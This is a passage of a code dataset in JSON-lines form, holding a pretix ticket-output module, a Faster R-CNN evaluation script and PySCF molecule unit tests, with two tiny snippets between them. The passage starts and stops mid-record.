int, provider: str):\n event = Event.objects.get(id=event)\n\n with rolledback_transaction(), language(event.settings.locale):\n item = event.items.create(name=_(\"Sample product\"), default_price=42.23,\n description=_(\"Sample product description\"))\n item2 = event.items.create(name=_(\"Sample workshop\"), default_price=23.40)\n\n from pretix.base.models import Order\n order = event.orders.create(status=Order.STATUS_PENDING, datetime=now(),\n email='sample@pretix.eu',\n locale=event.settings.locale,\n expires=now(), code=\"PREVIEW1234\", total=119)\n\n scheme = PERSON_NAME_SCHEMES[event.settings.name_scheme]\n sample = {k: str(v) for k, v in scheme['sample'].items()}\n p = order.positions.create(item=item, attendee_name_parts=sample, price=item.default_price)\n s = event.subevents.first()\n order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)\n order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)\n\n InvoiceAddress.objects.create(order=order, name_parts=sample, company=_(\"Sample company\"))\n\n responses = register_ticket_outputs.send(event)\n for receiver, response in responses:\n prov = response(event)\n if prov.identifier == provider:\n return prov.generate(p)\n\n\ndef get_tickets_for_order(order, base_position=None):\n can_download = all([r for rr, r in allow_ticket_download.send(order.event, order=order)])\n if not can_download:\n return []\n if not order.ticket_download_available:\n return []\n\n providers = [\n response(order.event)\n for receiver, response\n in register_ticket_outputs.send(order.event)\n ]\n\n tickets = []\n\n positions = list(order.positions_with_tickets)\n if base_position:\n # Only the given position and its children\n positions = [\n p for p in positions if p.pk == base_position.pk or p.addon_to_id == base_position.pk\n ]\n\n for p in providers:\n if not p.is_enabled:\n continue\n\n if p.multi_download_enabled and not base_position:\n try:\n if len(positions) == 0:\n continue\n ct = CachedCombinedTicket.objects.filter(\n order=order, provider=p.identifier, file__isnull=False\n ).last()\n if not ct or not ct.file:\n retval = generate_order(order.pk, p.identifier)\n if not retval:\n continue\n ct = CachedCombinedTicket.objects.get(pk=retval)\n tickets.append((\n \"{}-{}-{}{}\".format(\n order.event.slug.upper(), order.code, ct.provider, ct.extension,\n ),\n ct\n ))\n except:\n logger.exception('Failed to generate ticket.')\n else:\n for pos in positions:\n try:\n ct = CachedTicket.objects.filter(\n order_position=pos, provider=p.identifier, file__isnull=False\n ).last()\n if not ct or not ct.file:\n retval = generate_orderposition(pos.pk, p.identifier)\n if not retval:\n continue\n ct = CachedTicket.objects.get(pk=retval)\n\n if ct.type == 'text/uri-list':\n continue\n\n tickets.append((\n \"{}-{}-{}-{}{}\".format(\n order.event.slug.upper(), order.code, pos.positionid, ct.provider, ct.extension,\n ),\n ct\n ))\n except:\n logger.exception('Failed to generate ticket.')\n\n return tickets\n\n\n@app.task(base=EventTask)\ndef invalidate_cache(event: Event, item: int=None, provider: str=None, order: int=None, **kwargs):\n qs = CachedTicket.objects.filter(order_position__order__event=event)\n qsc = CachedCombinedTicket.objects.filter(order__event=event)\n\n if item:\n qs = qs.filter(order_position__item_id=item)\n\n if provider:\n qs = qs.filter(provider=provider)\n qsc = qsc.filter(provider=provider)\n\n if order:\n qs = qs.filter(order_position__order_id=order)\n qsc = qsc.filter(order_id=order)\n\n for ct in qs:\n ct.delete()\n for ct in qsc:\n ct.delete()\n"} {"ext": "py", "sha": "1a2f76a94c5ed91ed2dc7945d88a25a1c51187d6", "content": "\n\"\"\"A set of wrapper functions for accessing the eBusd API.\"\"\"\n\nfrom .ebusdpy import (init, read, write, raw)\n"} {"ext": "py", "sha": "1a2f770c5e85f92efca2174d52315a2cd4636e73", "content": "p8 = plot_implicit(y - 1, y_var=y)\r\np9 = plot_implicit(x - 1, x_var=x)\r\n"} {"ext": "py", "sha": "1a2f773d17b0bffa95ae6f4c9e858e9bf0c41348", "content": "# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Jiasen Lu, Jianwei Yang, based on code from Ross Girshick\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport _init_paths\nimport os\nimport sys\nimport numpy as np\nimport argparse\nimport pprint\nimport pdb\nimport time\nimport cv2\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.optim as optim\nimport pickle\nfrom roi_data_layer.roidb import combined_roidb\nfrom roi_data_layer.roibatchLoader import roibatchLoader\nfrom model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir\nfrom model.rpn.bbox_transform import clip_boxes\nfrom model.nms.nms_wrapper import nms\nfrom model.rpn.bbox_transform import bbox_transform_inv\nfrom model.utils.net_utils import save_net, load_net, vis_detections\nfrom model.faster_rcnn.vgg16 import vgg16\nfrom model.faster_rcnn.resnet import resnet\n\nimport pdb\n\ntry:\n xrange # Python 2\nexcept NameError:\n xrange = range # Python 3\n\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Train a Fast R-CNN network')\n parser.add_argument('--dataset', dest='dataset',\n help='training dataset',\n default='pascal_voc', type=str)\n parser.add_argument('--cfg', dest='cfg_file',\n help='optional config file',\n default='cfgs/vgg16.yml', type=str)\n parser.add_argument('--net', dest='net',\n help='vgg16, res50, res101, res152',\n default='res101', type=str)\n parser.add_argument('--set', dest='set_cfgs',\n help='set config keys', default=None,\n nargs=argparse.REMAINDER)\n parser.add_argument('--load_dir', dest='load_dir',\n help='directory to load models', default=\"/srv/share/jyang375/models\",\n type=str)\n parser.add_argument('--cuda', dest='cuda',\n help='whether use CUDA',\n action='store_true')\n parser.add_argument('--ls', dest='large_scale',\n help='whether use large imag scale',\n action='store_true')\n parser.add_argument('--mGPUs', dest='mGPUs',\n help='whether use multiple GPUs',\n action='store_true')\n parser.add_argument('--cag', dest='class_agnostic',\n help='whether perform class_agnostic bbox regression',\n action='store_true')\n parser.add_argument('--parallel_type', dest='parallel_type',\n help='which part of model to parallel, 0: all, 1: model before roi pooling',\n default=0, type=int)\n parser.add_argument('--checksession', dest='checksession',\n help='checksession to load model',\n default=1, type=int)\n parser.add_argument('--checkepoch', dest='checkepoch',\n help='checkepoch to load network',\n default=1, type=int)\n parser.add_argument('--checkpoint', dest='checkpoint',\n help='checkpoint to load network',\n default=10021, type=int)\n parser.add_argument('--vis', dest='vis',\n help='visualization mode',\n action='store_true')\n args = parser.parse_args()\n return args\n\nlr = cfg.TRAIN.LEARNING_RATE\nmomentum = cfg.TRAIN.MOMENTUM\nweight_decay = cfg.TRAIN.WEIGHT_DECAY\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n print('Called with args:')\n print(args)\n\n if torch.cuda.is_available() and not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n np.random.seed(cfg.RNG_SEED)\n if args.dataset == \"pascal_voc\":\n args.imdb_name = \"voc_2007_trainval\"\n args.imdbval_name = \"voc_2007_test\"\n args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n elif args.dataset == \"pascal_voc_0712\":\n args.imdb_name = \"voc_2007_trainval+voc_2012_trainval\"\n args.imdbval_name = \"voc_2007_test\"\n args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n elif args.dataset == \"coco\":\n args.imdb_name = \"coco_2014_train+coco_2014_valminusminival\"\n args.imdbval_name = \"coco_2014_minival\"\n args.set_cfgs = ['ANCHOR_SCALES', '[4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n elif args.dataset == \"imagenet\":\n args.imdb_name = \"imagenet_train\"\n args.imdbval_name = \"imagenet_val\"\n args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n elif args.dataset == \"imagenet_vid\":\n args.imdb_name = \"imagenet_vid_train+imagenet_det_train\"\n args.imdbval_name = \"imagenet_vid_val\"\n args.set_cfgs = ['ANCHOR_SCALES', '[4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n elif args.dataset == \"vg\":\n args.imdb_name = \"vg_150-50-50_minitrain\"\n args.imdbval_name = \"vg_150-50-50_minival\"\n args.set_cfgs = ['ANCHOR_SCALES', '[4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n\n args.cfg_file = \"cfgs/{}_ls.yml\".format(args.net) if args.large_scale else \"cfgs/{}.yml\".format(args.net)\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n\n print('Using config:')\n pprint.pprint(cfg)\n\n cfg.TRAIN.USE_FLIPPED = False\n imdb, roidb, ratio_list, ratio_index = combined_roidb(args.imdbval_name, False)\n imdb.competition_mode(on=True)\n\n print('{:d} roidb entries'.format(len(roidb)))\n\n input_dir = args.load_dir + \"/\" + args.net + \"/\" + args.dataset\n if not os.path.exists(input_dir):\n raise Exception('There is no input directory for loading network from ' + input_dir)\n load_name = os.path.join(input_dir,\n 'faster_rcnn_{}_{}_{}.pth'.format(args.checksession, args.checkepoch, args.checkpoint))\n\n # initilize the network here.\n if args.net == 'vgg16':\n fasterRCNN = vgg16(imdb.classes, pretrained=False, class_agnostic=args.class_agnostic)\n elif args.net == 'res101':\n fasterRCNN = resnet(imdb.classes, 101, pretrained=False, class_agnostic=args.class_agnostic)\n elif args.net == 'res50':\n fasterRCNN = resnet(imdb.classes, 50, pretrained=False, class_agnostic=args.class_agnostic)\n elif args.net == 'res152':\n fasterRCNN = resnet(imdb.classes, 152, pretrained=False, class_agnostic=args.class_agnostic)\n else:\n print(\"network is not defined\")\n pdb.set_trace()\n\n fasterRCNN.create_architecture()\n\n print(\"load checkpoint %s\" % (load_name))\n checkpoint = torch.load(load_name)\n fasterRCNN.load_state_dict(checkpoint['model'])\n if 'pooling_mode' in checkpoint.keys():\n cfg.POOLING_MODE = checkpoint['pooling_mode']\n\n\n print('load model successfully!')\n # initilize the tensor holder here.\n im_data = torch.FloatTensor(1)\n im_info = torch.FloatTensor(1)\n num_boxes = torch.LongTensor(1)\n gt_boxes = torch.FloatTensor(1)\n\n # ship to cuda\n if args.cuda:\n im_data = im_data.cuda()\n im_info = im_info.cuda()\n num_boxes = num_boxes.cuda()\n gt_boxes = gt_boxes.cuda()\n\n # make variable\n im_data = Variable(im_data, volatile=True)\n im_info = Variable(im_info, volatile=True)\n num_boxes = Variable(num_boxes, volatile=True)\n gt_boxes = Variable(gt_boxes, volatile=True)\n\n if args.cuda:\n cfg.CUDA = True\n\n if args.cuda:\n fasterRCNN.cuda()\n\n start = time.time()\n max_per_image = 100\n\n vis = args.vis\n\n if vis:\n thresh = 0.05\n else:\n thresh = 0.0\n\n save_name = 'faster_rcnn_10'\n num_images = len(imdb.image_index)\n all_boxes = [[[] for _ in xrange(num_images)]\n for _ in xrange(imdb.num_classes)]\n\n output_dir = get_output_dir(imdb, save_name)\n dataset = roibatchLoader(roidb, ratio_list, ratio_index, 1, \\\n imdb.num_classes, training=False, normalize = False)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1,\n shuffle=False, num_workers=0,\n pin_memory=True)\n\n data_iter = iter(dataloader)\n\n _t = {'im_detect': time.time(), 'misc': time.time()}\n det_file = os.path.join(output_dir, 'detections.pkl')\n\n fasterRCNN.eval()\n empty_array = np.transpose(np.array([[],[],[],[],[]]), (1,0))\n for i in range(num_images):\n\n data = next(data_iter)\n im_data.data.resize_(data[0].size()).copy_(data[0])\n im_info.data.resize_(data[1].size()).copy_(data[1])\n gt_boxes.data.resize_(data[2].size()).copy_(data[2])\n num_boxes.data.resize_(data[3].size()).copy_(data[3])\n\n det_tic = time.time()\n rois, cls_prob, bbox_pred, \\\n rpn_loss_cls, rpn_loss_box, \\\n RCNN_loss_cls, RCNN_loss_bbox, \\\n rois_label = fasterRCNN(im_data, im_info, gt_boxes, num_boxes)\n\n scores = cls_prob.data\n boxes = rois.data[:, :, 1:5]\n\n if cfg.TEST.BBOX_REG:\n # Apply bounding-box regression deltas\n box_deltas = bbox_pred.data\n if cfg.TRAIN.BBOX_NORMALIZE_TARGETS_PRECOMPUTED:\n # Optionally normalize targets by a precomputed mean and stdev\n if args.class_agnostic:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n box_deltas = box_deltas.view(1, -1, 4)\n else:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n box_deltas = box_deltas.view(1, -1, 4 * len(imdb.classes))\n\n pred_boxes = bbox_transform_inv(boxes, box_deltas, 1)\n pred_boxes = clip_boxes(pred_boxes, im_info.data, 1)\n else:\n # Simply repeat the boxes, once for each class\n pred_boxes = np.tile(boxes, (1, scores.shape[1]))\n\n pred_boxes /= data[1][0][2]\n\n scores = scores.squeeze()\n pred_boxes = pred_boxes.squeeze()\n det_toc = time.time()\n detect_time = det_toc - det_tic\n misc_tic = time.time()\n if vis:\n im = cv2.imread(imdb.image_path_at(i))\n im2show = np.copy(im)\n for j in xrange(1, imdb.num_classes):\n inds = torch.nonzero(scores[:,j]>thresh).view(-1)\n # if there is det\n if inds.numel() > 0:\n cls_scores = scores[:,j][inds]\n _, order = torch.sort(cls_scores, 0, True)\n if args.class_agnostic:\n cls_boxes = pred_boxes[inds, :]\n else:\n cls_boxes = pred_boxes[inds][:, j * 4:(j + 1) * 4]\n \n cls_dets = torch.cat((cls_boxes, cls_scores.unsqueeze(1)), 1)\n # cls_dets = torch.cat((cls_boxes, cls_scores), 1)\n cls_dets = cls_dets[order]\n keep = nms(cls_dets, cfg.TEST.NMS)\n cls_dets = cls_dets[keep.view(-1).long()]\n if vis:\n im2show = vis_detections(im2show, imdb.classes[j], cls_dets.cpu().numpy(), 0.3)\n all_boxes[j][i] = cls_dets.cpu().numpy()\n else:\n all_boxes[j][i] = empty_array\n\n # Limit to max_per_image detections *over all classes*\n if max_per_image > 0:\n image_scores = np.hstack([all_boxes[j][i][:, -1]\n for j in xrange(1, imdb.num_classes)])\n if len(image_scores) > max_per_image:\n image_thresh = np.sort(image_scores)[-max_per_image]\n for j in xrange(1, imdb.num_classes):\n keep = np.where(all_boxes[j][i][:, -1] >= image_thresh)[0]\n all_boxes[j][i] = all_boxes[j][i][keep, :]\n\n misc_toc = time.time()\n nms_time = misc_toc - misc_tic\n\n sys.stdout.write('im_detect: {:d}/{:d} {:.3f}s {:.3f}s \\r' \\\n .format(i + 1, num_images, detect_time, nms_time))\n sys.stdout.flush()\n\n if vis:\n cv2.imwrite('result.png', im2show)\n pdb.set_trace()\n #cv2.imshow('test', im2show)\n #cv2.waitKey(0)\n\n with open(det_file, 'wb') as f:\n pickle.dump(all_boxes, f, pickle.HIGHEST_PROTOCOL)\n\n # print('Evaluating detections')\n # imdb.evaluate_detections(all_boxes, output_dir)\n\n end = time.time()\n print(\"test time: %0.4fs\" % (end - start))\n"} {"ext": "py", "sha": "1a2f77a4a0f8500359799f5a5f44fb0998390381", "content": "#!/usr/bin/env python\n# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport copy\nimport unittest\nimport tempfile\nfrom functools import reduce\nimport numpy\nimport scipy.linalg\nfrom pyscf import gto\nfrom pyscf import lib\nimport pyscf.lib.parameters as param\n\nmol0 = gto.Mole()\nmol0.atom = [\n [1 , (0.,1.,1.)],\n [\"O1\", (0.,0.,0.)],\n [1 , (1.,1.,0.)], ]\nmol0.nucmod = { \"O\":'gaussian', 3:'g' }\nmol0.unit = 'ang'\nmol0.basis = {\n \"O\": [(0, 0, (15, 1)), ] + gto.etbs(((0, 4, 1, 1.8),\n (1, 3, 2, 1.8),\n (2, 2, 1, 1.8),)),\n \"H\": [(0, 0, (1, 1, 0), (3, 3, 1), (5, 1, 0)),\n (1, -2, (1, 1)), ]}\nmol0.symmetry = 1\nmol0.charge = 1\nmol0.spin = 1\nmol0.verbose = 7\nmol0.ecp = {'O1': 'lanl2dz'}\nftmp = tempfile.NamedTemporaryFile()\nmol0.output = ftmp.name\nmol0.build()\n\ndef tearDownModule():\n global mol0, ftmp\n mol0.stdout.close()\n del mol0, ftmp\n\nclass KnownValues(unittest.TestCase):\n def test_intor_cross(self):\n mol1 = mol0.unpack(mol0.pack())\n mol1.symmetry = True\n mol1.unit = 'Ang'\n mol1.atom = '''\n 1 0 1 1\n O 0 0 0\n h 1 1 0'''\n mol1.basis = {'O': gto.basis.parse('''\nC S\n 3047.5249000 0.0018347 \n 457.3695100 0.0140373 \n 103.9486900 0.0688426 \n 29.2101550 0.2321844 \n 9.2866630 0.4679413 \n 3.1639270 0.3623120 \n# 1. 0.1\nC SP\n 7.8682724 -0.1193324 0.0689991 \n 1.8812885 -0.1608542 0.3164240 \n 0.5442493 1.1434564 0.7443083 \nC SP\n 0.1687144 1.0000000 1.0000000'''),\n 'H': '6-31g'}\n mol1.build()\n v = gto.mole.intor_cross('cint1e_ovlp_sph', mol0, mol1)\n self.assertAlmostEqual(numpy.linalg.norm(v), 3.6489423434168562, 1)\n\n def test_num_basis(self):\n self.assertEqual(mol0.nao_nr(), 34)\n self.assertEqual(mol0.nao_2c(), 64)\n\n def test_time_reversal_map(self):\n tao = [ -2, 1, -4, 3, 8, -7, 6, -5,-10, 9,-12, 11,-14, 13,-16, 15,-18, 17,\n 20,-19, 24,-23, 22,-21, 26,-25, 30,-29, 28,-27, 32,-31, 36,-35, 34,-33,\n -40, 39,-38, 37,-46, 45,-44, 43,-42, 41,-50, 49,-48, 47,-56, 55,-54, 53,\n -52, 51,-58, 57,-60, 59, 64,-63, 62,-61]\n self.assertEqual(list(mol0.time_reversal_map()), tao)\n\n def test_check_sanity(self):\n mol1 = mol0.copy()\n mol1.x = None\n mol1.copy = None\n mol1.check_sanity()\n\n def test_nao_range(self):\n self.assertEqual(mol0.nao_nr_range(1,4), (2, 7))\n self.assertEqual(mol0.nao_2c_range(1,4), (4, 12))\n self.assertEqual(numpy.dot(range(mol0.nbas+1), mol0.ao_loc_nr()), 2151)\n self.assertEqual(numpy.dot(range(mol0.nbas+1), mol0.ao_loc_2c()), 4066)\n\n def test_search_bas(self):\n self.assertEqual(mol0.search_shell_id(1, 1), 7)\n self.assertRaises(RuntimeError, mol0.search_ao_nr, 1, 1, -1, 5)\n self.assertEqual(mol0.search_ao_nr(1, 1, -1, 4), 16)\n mol0.cart = True\n self.assertEqual(mol0.search_ao_nr(2, 1, -1, 1), 30)\n mol0.cart = False\n\n def test_atom_types(self):\n atoms = [['H0', ( 0, 0, 0)],\n ['H1', ( 0, 0, 0)],\n ['H', ( 0, 0, 0)],\n ['H3', ( 0, 0, 0)]]\n basis = {'H':'sto3g', 'H1': '6-31g'}\n atmgroup = gto.mole.atom_types(atoms, basis)\n self.assertEqual(atmgroup, {'H': [0, 2, 3], 'H1': [1]})\n atoms = [['H0', ( 0, 0, 0)],\n ['H1', ( 0, 0, 0)],\n ['H2', ( 0, 0, 0)],\n ['H3', ( 0, 0, 0)]]\n basis = {'H2':'sto3g', 'H3':'6-31g', 'H0':'sto3g', 'H1': '6-31g'}\n atmgroup = gto.mole.atom_types(atoms, basis)\n self.assertEqual(atmgroup, {'H2': [2], 'H3': [3], 'H0': [0], 'H1': [1]})\n\n def test_given_symmetry(self):\n mol = gto.M(atom='H 0 0 -1; H 0 0 1', symmetry='D2h')\n self.assertEqual(mol.irrep_id, [0, 5])\n mol = gto.M(atom='H 0 0 -1; H 0 0 1', symmetry='D2')\n self.assertEqual(mol.irrep_id, [0, 1])\n mol = gto.M(atom='H 0 0 -1; H 0 0 1', symmetry='C2v')\n self.assertEqual(mol.irrep_id, [0])\n\n def test_dumps_loads(self):\n import warnings\n mol1 = gto.M()\n mol1.x = lambda *args: None\n with warnings.catch_warnings(record=True) as w:\n warnings.simplefilter(\"always\")\n d = mol1.dumps()\n self.assertTrue(w[0].category, UserWarning)\n mol1.loads(mol0.dumps())\n\n def test_symm_orb_serialization(self):\n '''Handle the complex symmetry-adapted orbitals'''\n mol = gto.M(atom='He', basis='ccpvdz', symmetry=True)\n mol.loads(mol.dumps())\n\n lz_minus = numpy.sqrt(.5) * (mol.symm_orb[3] - mol.symm_orb[2] * 1j)\n lz_plus = -numpy.sqrt(.5) * (mol.symm_orb[3] + mol.symm_orb[2] * 1j)\n mol.symm_orb[2] = lz_minus\n mol.symm_orb[3] = lz_plus\n mol.loads(mol.dumps())\n self.assertTrue(mol.symm_orb[0].dtype == numpy.double)\n self.assertTrue(mol.symm_orb[2].dtype == numpy.complex128)\n self.assertTrue(mol.symm_orb[3].dtype == numpy.complex128)\n\n def test_same_mol1(self):\n self.assertTrue(gto.same_mol(mol0, mol0))\n mol1 = gto.M(atom='h 0 1 1; O1 0 0 0; h 1 1 0')\n self.assertTrue(not gto.same_mol(mol0, mol1))\n self.assertTrue(gto.same_mol(mol0, mol1, cmp_basis=False))\n\n mol1 = gto.M(atom='h 0 1 1; O1 0 0 0; h 1 1 0.01')\n self.assertTrue(not gto.same_mol(mol0, mol1, cmp_basis=False))\n self.assertTrue(gto.same_mol(mol0, mol1, tol=.02, cmp_basis=False))\n\n mol1 = gto.M(atom='''H 0.0052917700 0.0000000000 -0.8746076326\n F 0.0000000000 0.0000000000 0.0516931447''')\n mol2 = gto.M(atom='''H 0.0000000000 0.0000000000 -0.8746076326\n F 0.0000000000 0.0000000000 0.0516931447''')\n self.assertTrue(gto.same_mol(mol1, mol2))\n self.assertTrue(not gto.same_mol(mol1, mol2, tol=1e-6))\n mol3 = gto.M(atom='''H 0.0000000000 0.0000000000 -0.8746076326\n H 0.0000000000 0.0000000000 0.0516931447''')\n self.assertTrue(not gto.same_mol(mol3, mol2))\n\n def test_same_mol2(self):\n mol1 = gto.M(atom='H 0.0052917700 0.0000000000 -0.8746076326; F 0.0000000000 0.0000000000 0.0464013747')\n mol2 = gto.M(atom='H 0.0000000000 0.0000000000 -0.8746076326; F 0.0052917700 0.0000000000 0.0464013747')\n self.assertTrue(gto.same_mol(mol1, mol2))\n\n mol1 = gto.M(atom='H 0.0052917700 0.0000000000 -0.8693158626; F 0.0000000000 0.0000000000 0.0464013747')\n mol2 = gto.M(atom='H 0.0000000000 0.0052917700 -0.8693158626; F 0.0000000000 0.0000000000 0.0464013747')\n mol3 = gto.M(atom='H 0.0000000000 0.0000000000 -0.8693158626; F 0.0052917700 0.0000000000 0.0464013747')\n mol4 = gto.M(atom='H -0.0052917700 0.0000000000 -0.8746076326; F 0.0000000000 0.0000000000 0.0411096047')\n mols = (mol1, mol2, mol3, mol4)\n for i,mi in enumerate(mols):\n for j in range(i):\n self.assertTrue(gto.same_mol(mols[i], mols[j]))\n\n mol1 = gto.M(atom='''H 0.0000000000 0.0000000000 0.0000000000\n H 0.9497795800 1.3265673200 0.0000000000\n H 0.9444878100 -1.3265673200 0.0000000000\n H1 -0.9444878100 0.0000000000 1.3265673200\n H1 -0.9444878100 0.0000000000 -1.3265673200''', basis={'H':'sto3g', 'H1':'sto3g'}, charge=1)\n mol2 = gto.M(atom='''H 0.0000000000 0.0000000000 0.0000000000\n H 0.9444878100 1.3265673200 0.0000000000\n H 0.9497795800 -1.3265673200 0.0000000000\n H1 -0.9444878100 0.0000000000 1.3265673200\n H1 -0.9444878100 0.0000000000 -1.3265673200''', basis={'H':'sto3g', 'H1':'sto3g'}, charge=1)\n self.assertTrue(gto.same_mol(mol1, mol2))\n self.assertEqual(len(gto.atom_types(mol1._atom)), 2)\n mol3 = gto.M(atom='''H 0.0000000000 0.0000000000 0.0000000000\n H1 0.9497795800 1.3265673200 0.0000000000\n H1 0.9444878100 -1.3265673200 0.0000000000\n H1 -0.9444878100 0.0000000000 1.3265673200\n H1 -0.9444878100 0.0000000000 -1.3265673200''', basis={'H':'sto3g', 'H1':'321g'}, charge=1)\n self.assertTrue(not gto.same_mol(mol3, mol2))\n\n def test_inertia_momentum(self):\n mol1 = gto.Mole()\n mol1.atom = mol0.atom\n mol1.nucmod = 'G'\n mol1.verbose = 5\n mol1.nucprop = {'H': {'mass': 3}}\n mol1.output = '/dev/null'\n mol1.build(False, False)\n self.assertAlmostEqual(lib.finger(gto.inertia_moment(mol1)),\n 2.139593709454326, 9)\n\n mass = mol0.atom_mass_list(isotope_avg=True)\n self.assertAlmostEqual(lib.finger(gto.inertia_moment(mol1, mass)),\n 2.1549269955776205, 9)\n\n def test_chiral_mol(self):\n mol1 = gto.M(atom='C 0 0 0; H 1 1 1; He -1 -1 1; Li -1 1 -1; Be 1 -1 -1')\n mol2 = gto.M(atom='C 0 0 0; H 1 1 1; He -1 -1 1; Be -1 1 -1; Li 1 -1 -1')\n self.assertTrue(gto.chiral_mol(mol1, mol2))\n self.assertTrue(gto.chiral_mol(mol1))\n\n mol1 = gto.M(atom='''H 0.9444878100 1.3265673200 0.0052917700\n H 0.9444878100 -1.3265673200 0.0000000000\n H -0.9444878100 0.0000000000 1.3265673200\n H -0.9444878100 0.0000000000 -1.3265673200''')\n mol2 = gto.M(atom='''H 0.9444878100 1.3265673200 0.0000000000\n H 0.9444878100 -1.3265673200 0.0052917700\n H -0.9444878100 0.0000000000 1.3265673200\n H -0.9444878100 0.0000000000 -1.3265673200''')\n self.assertTrue(gto.chiral_mol(mol1, mol2))\n\n mol1 = gto.M(atom='''H 0.9444878100 1.3265673200 0.0052917700\n H 0.9444878100 -1.3265673200 0.0000000000\n H -0.9444878100 0.0000000000 1.3265673200\n H -0.9444878100 0.0000000000 -1.3265673200''')\n self.assertTrue(gto.chiral_mol(mol1))\n\n def test_first_argument(self):\n mol1 = gto.Mole()\n mol1.build('He')\n self.assertEqual(mol1.natm, 1)\n\n def test_atom_as_file(self):\n ftmp = tempfile.NamedTemporaryFile('w')\n # file in xyz format\n ftmp.write('He 0 0 0\\nHe 0 0 1\\n')\n ftmp.flush()\n mol1 = gto.M(atom=ftmp.name)\n self.assertEqual(mol1.natm, 2)\n\n # file in zmatrix format\n ftmp = tempfile.NamedTemporaryFile('w')\n ftmp.write('He\\nHe 1 1.5\\n')\n ftmp.flush()\n mol1 = gto.M(atom=ftmp.name)\n self.assertEqual(mol1.natm, 2)\n\n def test_format_atom(self):\n atoms = [['h' , 0,1,1], \"O1 0. 0. 0.\", [1, 1.,1.,0.],]\n self.assertTrue(numpy.allclose(gto.mole.format_atom(atoms, unit='Ang')[0][1],\n [0.0, 1.8897261245650618, 1.8897261245650618]))\n atoms = '''h 0 1 1\n O1 0 0 0; 1 1 1 0; #H 0 0 3'''\n self.assertTrue(numpy.allclose(gto.mole.format_atom(atoms, unit=1)[0][1],\n [0.0, 1., 1.]))\n atoms = 'O1; h 1 1; 1 1 1 2 90'\n atoms = gto.mole.format_atom(atoms, unit=1)[2]\n self.assertEqual(atoms[0], 'H')\n self.assertTrue(numpy.allclose(atoms[1], [0, 0, 1.]))\n\n def test_format_basis(self):\n mol = gto.M(atom = '''O 0 0 0; 1 0 1 0; H 0 0 1''',\n basis = {8: 'ccpvdz'})\n self.assertEqual(mol.nao_nr(), 14)\n\n mol = gto.M(atom = '''O 0 0 0; H:1 0 1 0; H@2 0 0 1''',\n basis = {'O': 'ccpvdz', 'H:1': 'sto3g', 'H': 'unc-iglo3'})\n self.assertEqual(mol.nao_nr(), 32)\n\n mol = gto.M(\n atom = '''O 0 0 0; H1 0 1 0; H2 0 0 1''',\n basis = {'default': ('6-31g', [[0, [.05, 1.]], []]), 'H2': 'sto3g'}\n )\n self.assertEqual(mol.nao_nr(), 14)\n\n mol = gto.M(\n atom = '''O 0 0 0; H1 0 1 0; H2 0 0 1''',\n basis = {'H1': gto.parse('''\n# Parse NWChem format basis string (see https://bse.pnl.gov/bse/portal).\n# Comment lines are ignored\n#BASIS SET: (6s,3p) -> [2s,1p]\n H S\n 2.9412494 -0.09996723\n 0.6834831 0.39951283\n 0.2222899 0.70011547\n H S\n 2.9412494 0.15591627\n 0.6834831 0.60768372\n 0.2222899 0.39195739\n ''', optimize=True),\n 'O': 'unc-ccpvdz',\n 'H2': gto.load('sto-3g', 'He') # or use basis of another atom\n }\n )\n self.assertEqual(mol.nao_nr(), 29)\n\n mol = gto.M(\n atom = '''O 0 0 0; H1 0 1 0; H2 0 0 1''',\n basis = {'H': ['sto3g', '''unc\n C S\n 71.6168370 0.15432897\n 13.0450960 0.53532814\n 3.5305122 0.44463454\n C SP\n 2.9412494 -0.09996723 0.15591627\n 0.6834831 0.39951283 0.60768372\n 0.2222899 0.70011547 0.39195739\n '''],\n 'O': mol.expand_etbs([(0, 4, 1.5, 2.2), # s-function\n (1, 2, 0.5, 2.2)]) # p-function\n }\n )\n self.assertEqual(mol.nao_nr(), 42)\n\n mol = gto.M(\n atom = '''O 0 0 0; H1 0 1 0; H2 0 0 1''',\n basis = ('sto3g', 'ccpvdz', '3-21g',\n gto.etbs([(0, 4, 1.5, 2.2), (1, 2, 0.5, 2.2)]),\n [[0, numpy.array([1e3, 1.])]])\n )\n self.assertEqual(mol.nao_nr(), 77)\n\n mol.atom = 'Hg'\n mol.basis = 'ccpvdz'\n self.assertRaises(RuntimeError, mol.build)\n\n def 